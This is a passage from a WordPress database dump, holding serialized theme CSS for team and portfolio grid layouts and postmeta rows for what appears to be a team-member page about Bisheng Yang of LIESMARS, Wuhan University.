.dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(16309,2959,'_edit_lock','1667407486:1'),
(16310,2960,'_wp_attached_file','2022/11/w172.jpg'),
(16311,2960,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:140;s:6:\"height\";i:144;s:4:\"file\";s:16:\"2022/11/w172.jpg\";s:8:\"filesize\";i:9520;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16312,2959,'_thumbnail_id','2960'),
(16313,2959,'_edit_last','1'),
(16314,2959,'_dt_sidebar_position','disabled'),
(16315,2959,'_dt_sidebar_widgetarea_id','sidebar_1'),
(16316,2959,'_dt_sidebar_hide_on_mobile','0'),
(16317,2959,'_dt_footer_show','0'),
(16318,2959,'_dt_footer_widgetarea_id','sidebar_2'),
(16319,2959,'_dt_footer_hide_on_mobile','0'),
(16320,2959,'_dt_header_title','fancy'),
(16321,2959,'_dt_header_background','normal'),
(16322,2959,'_dt_header_background_below_slideshow','disabled'),
(16323,2959,'_dt_header_transparent_bg_color_scheme','light'),
(16324,2959,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(16325,2959,'_dt_header_transparent_top_bar_bg_opacity','25'),
(16326,2959,'_dt_header_transparent_bg_color','#000000'),
(16327,2959,'_dt_header_transparent_bg_opacity','50'),
(16328,2959,'_dt_header_disabled_background','normal'),
(16329,2959,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(16330,2959,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(16331,2959,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(16332,2959,'_dt_header_disabled_transparent_bg_color','#000000'),
(16333,2959,'_dt_header_disabled_transparent_bg_opacity','50'),
(16334,2959,'_dt_page_overrides_top_margin',''),
(16335,2959,'_dt_page_overrides_right_margin',''),
(16336,2959,'_dt_page_overrides_bottom_margin',''),
(16337,2959,'_dt_page_overrides_left_margin',''),
(16338,2959,'_dt_mobile_page_padding_top',''),
(16339,2959,'_dt_mobile_page_padding_right',''),
(16340,2959,'_dt_mobile_page_padding_bottom',''),
(16341,2959,'_dt_mobile_page_padding_left',''),
(16342,2959,'_dt_fancy_header_layout_heading',''),
(16343,2959,'_dt_fancy_header_title_aligment','center'),
(16344,2959,'_dt_fancy_header_height','300'),
(16345,2959,'_dt_fancy_header_padding-top','0px'),
(16346,2959,'_dt_fancy_header_padding-bottom','0px'),
(16347,2959,'_dt_fancy_header_breadcrumbs_heading',''),
(16348,2959,'_dt_fancy_header_breadcrumbs','disabled'),
(16349,2959,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16350,2959,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16351,2959,'_dt_fancy_header_title_heading',''),
(16352,2959,'_dt_fancy_header_title_mode','custom'),
(16353,2959,'_dt_fancy_header_title','Bisheng Yang,  LIESMARS Wuhan University,  China (WG II/2)'),
(16354,2959,'_dt_fancy_header_title_font_size','30'),
(16355,2959,'_dt_fancy_header_title_line_height','36'),
(16356,2959,'_dt_fancy_header_text_transform','none'),
(16357,2959,'_dt_fancy_header_title_color_mode','color'),
(16358,2959,'_dt_fancy_header_title_color','#ffffff'),
(16359,2959,'_dt_fancy_header_subtitle_heading',''),
(16360,2959,'_dt_fancy_header_subtitle',''),
(16361,2959,'_dt_fancy_header_subtitle_font_size','18'),
(16362,2959,'_dt_fancy_header_subtitle_line_height','26'),
(16363,2959,'_dt_fancy_header_subtitle_text_transform','none'),
(16364,2959,'_dt_fancy_header_subtitle_color_mode','color'),
(16365,2959,'_dt_fancy_header_subtitle_color','#ffffff'),
(16366,2959,'_dt_fancy_header_bg_heading',''),
(16367,2959,'_dt_fancy_header_bg_color','#222222'),
(16368,2959,'_dt_fancy_header_bg_image_origin','custom'),
(16369,2959,'_dt_fancy_header_bg_image','a:0:{}'),
(16370,2959,'_dt_fancy_header_bg_repeat','no-repeat'),
(16371,2959,'_dt_fancy_header_bg_position_x','center'),
(16372,2959,'_dt_fancy_header_bg_position_y','center'),
(16373,2959,'_dt_fancy_header_bg_fullscreen','1'),
(16374,2959,'_dt_fancy_header_bg_overlay','0'),
(16375,2959,'_dt_fancy_header_overlay_color','#000'),
(16376,2959,'_dt_fancy_header_bg_overlay_opacity','50'),
(16377,2959,'_dt_fancy_header_scroll_effect','default'),
(16378,2959,'_dt_fancy_header_bg_parallax','0.5'),
(16379,2959,'_dt_fancy_header_responsiveness_heading',''),
(16380,2959,'_dt_fancy_header_responsiveness','enabled'),
(16381,2959,'_dt_fancy_header_responsiveness_switch','778px'),
(16382,2959,'_dt_fancy_header_responsive_height','70'),
(16383,2959,'_dt_fancy_header_responsive_font_size','30'),
(16384,2959,'_dt_fancy_header_responsive_title_line_height','38'),
(16385,2959,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16386,2959,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(16387,2959,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16388,2959,'_dt_teammate_options_go_to_single','1'),
(16389,2959,'_dt_teammate_options_position',''),
(16390,2959,'_dt_teammate_options_website',''),
(16391,2959,'_dt_teammate_options_mail',''),
(16392,2959,'_dt_teammate_options_facebook',''),
(16393,2959,'_dt_teammate_options_twitter',''),
(16394,2959,'_dt_teammate_options_dribbble',''),
(16395,2959,'_dt_teammate_options_you-tube',''),
(16396,2959,'_dt_teammate_options_rss',''),
(16397,2959,'_dt_teammate_options_delicious',''),
(16398,2959,'_dt_teammate_options_flickr',''),
(16399,2959,'_dt_teammate_options_lastfm',''),
(16400,2959,'_dt_teammate_options_linkedin',''),
(16401,2959,'_dt_teammate_options_vimeo',''),
(16402,2959,'_dt_teammate_options_tumbler',''),
(16403,2959,'_dt_teammate_options_pinterest',''),
(16404,2959,'_dt_teammate_options_devian',''),
(16405,2959,'_dt_teammate_options_skype',''),
(16406,2959,'_dt_teammate_options_github',''),
(16407,2959,'_dt_teammate_options_instagram',''),
(16408,2959,'_dt_teammate_options_stumbleupon',''),
(16409,2959,'_dt_teammate_options_behance',''),
(16410,2959,'_dt_teammate_options_px-500',''),
(16411,2959,'_dt_teammate_options_tripedvisor',''),
(16412,2959,'_dt_teammate_options_vk',''),
(16413,2959,'_dt_teammate_options_foursquare',''),
(16414,2959,'_dt_teammate_options_xing',''),
(16415,2959,'_dt_teammate_options_weibo',''),
(16416,2959,'_dt_teammate_options_odnoklassniki',''),
(16417,2959,'_dt_teammate_options_research-gate',''),
(16418,2959,'_dt_teammate_options_yelp',''),
(16419,2959,'_dt_teammate_options_blogger',''),
(16420,2959,'_dt_teammate_options_soundcloud',''),
(16421,2959,'_dt_teammate_options_viber',''),
(16422,2959,'_dt_teammate_options_whatsapp',''),
(16423,2959,'_dt_teammate_options_reddit',''),
(16424,2959,'_dt_teammate_options_snapchat',''),
(16425,2959,'_dt_teammate_options_telegram',''),
(16426,2959,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(16427,2961,'_edit_lock','1667407495:1'),
(16428,2962,'_wp_attached_file','2022/11/w173.jpg'),
(16429,2962,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:138;s:6:\"height\";i:147;s:4:\"file\";s:16:\"2022/11/w173.jpg\";s:8:\"filesize\";i:7145;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16430,2961,'_thumbnail_id','2962'),
(16431,2961,'_edit_last','1'),
(16432,2961,'_dt_sidebar_position','disabled'),
(16433,2961,'_dt_sidebar_widgetarea_id','sidebar_1'),
(16434,2961,'_dt_sidebar_hide_on_mobile','0'),
(16435,2961,'_dt_footer_show','0'),
(16436,2961,'_dt_footer_widgetarea_id','sidebar_2'),
(16437,2961,'_dt_footer_hide_on_mobile','0'),
(16438,2961,'_dt_header_title','fancy'),
(16439,2961,'_dt_header_background','normal'),
(16440,2961,'_dt_header_background_below_slideshow','disabled'),
(16441,2961,'_dt_header_transparent_bg_color_scheme','light'),
(16442,2961,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(16443,2961,'_dt_header_transparent_top_bar_bg_opacity','25'),
(16444,2961,'_dt_header_transparent_bg_color','#000000'),
(16445,2961,'_dt_header_transparent_bg_opacity','50'),
(16446,2961,'_dt_header_disabled_background','normal'),
(16447,2961,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(16448,2961,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(16449,2961,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(16450,2961,'_dt_header_disabled_transparent_bg_color','#000000'),
(16451,2961,'_dt_header_disabled_transparent_bg_opacity','50'),
(16452,2961,'_dt_page_overrides_top_margin',''),
(16453,2961,'_dt_page_overrides_right_margin',''),
(16454,2961,'_dt_page_overrides_bottom_margin',''),
(16455,2961,'_dt_page_overrides_left_margin',''),
(16456,2961,'_dt_mobile_page_padding_top',''),
(16457,2961,'_dt_mobile_page_padding_right',''),
(16458,2961,'_dt_mobile_page_padding_bottom',''),
(16459,2961,'_dt_mobile_page_padding_left',''),
(16460,2961,'_dt_fancy_header_layout_heading',''),
(16461,2961,'_dt_fancy_header_title_aligment','center'),
(16462,2961,'_dt_fancy_header_height','300'),
(16463,2961,'_dt_fancy_header_padding-top','0px'),
(16464,2961,'_dt_fancy_header_padding-bottom','0px'),
(16465,2961,'_dt_fancy_header_breadcrumbs_heading',''),
(16466,2961,'_dt_fancy_header_breadcrumbs','disabled'),
(16467,2961,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16468,2961,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16469,2961,'_dt_fancy_header_title_heading',''),
